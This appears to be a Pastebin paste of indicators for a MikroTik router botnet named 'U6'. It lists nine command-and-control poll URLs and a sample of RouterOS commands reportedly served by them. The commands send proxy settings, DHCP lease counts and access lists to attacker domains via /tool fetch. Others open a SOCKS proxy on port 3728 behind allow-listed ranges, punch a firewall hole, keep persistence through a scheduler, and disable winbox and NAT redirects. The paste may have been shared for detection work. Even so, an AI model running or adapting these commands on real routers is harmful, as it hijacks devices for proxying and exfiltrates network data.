Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- U6 - Mikrotik botnet
- U6 C2 servers:
- http://bestmade.xyz/poll/8ec89aaf-63bf-4e84-a1f8-6eba14305be6
- http://fanmusic.xyz/poll/22908bdb-eaf2-49e1-a532-a5e4ddf6715b
- http://gamesone.xyz/poll/8a81a096-1fc2-49cf-97f4-8984c579bd05
- http://mobigifs.xyz/poll/b6db13a6-af5d-4084-9ad9-c8ca8de49627
- http://mobstore.xyz/poll/a0509890-2359-45b2-a7e1-f0c6cd451adf
- http://my1story.xyz/poll/45bdc3f3-6d48-4755-884c-e07b4255c4a2
- http://myphotos.xyz/poll/fadccb02-376c-4ebb-a383-a1a5e4350a09
- http://onlinegt.xyz/poll/18eaad9a-28a4-4b2d-b2f9-55a0c8fb30c0
- http://picsgifs.xyz/poll/b7eca108-d209-41f9-9e94-889de7b54746
- Sample of commands pulled from the C2:
- { :local result [ /ip socks print as-value ]; /tool fetch url="http://gamesone.xyz/socks/8a81a096-1fc2-49cf-97f4-8984c579bd05" mode=http http-data=$result;}
- { :local result [ /ip dhcp-server lease print count-only ]; /tool fetch url="http://picsgifs.xyz/clients/b7eca108-d209-41f9-9e94-889de7b54746" mode=http http-data=$result;}
- { :local countRules [/ip socks access print count-only]; :for i from 0 to $countRules step=1 do= {/ip socks access remove $i} }
- /ip socks access add src-address=5.188.0.0/15 action=allow /ip socks access add src-address=192.243.0.0/16 action=allow /ip socks access add src-address=5.9.0.0/16 action=allow /ip socks access add src-address=5.104.0.0/16 action=allow /ip socks access add src-address=0.0.0.0/0 action=deny
- /ip firewall filter add action=accept chain=input disabled=no dst-port=3728 protocol=tcp place-before=1
- /ip socks set enable=yes /ip socks set port=3728
- /ip dns set servers=8.8.8.8,1.1.1.1
- :do { /system scheduler set U6 interval=00:00:15 } on-error={ :put "U6 not found"}
- /system scheduler set U6 interval=180s
- /system scheduler remove [/system scheduler find where name!=U6]
- /ip service disable winbox
- /ip socks access add src-address=82.204.203.0/24 action=allow place-before=0
- /ip socks access add src-address=192.243.53.0/24 action=allow place-before=0
- { :foreach i in=[/ip firewall nat find action=redirect] do={ /ip firewall nat disable numbers=$i }; };
- /ip socks access add src-address=94.130.51.0/24 action=allow place-before=0
- { :foreach i in=[/ip socks access find] do={ :local src [/ip socks access get $i src-address]; /tool fetch url="http://picsgifs.xyz/ips/b7eca108-d209-41f9-9e94-889de7b54746/$src" mode=http; }; };
- /ip socks access add src-address=95.213.221.0/24 action=allow place-before=0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement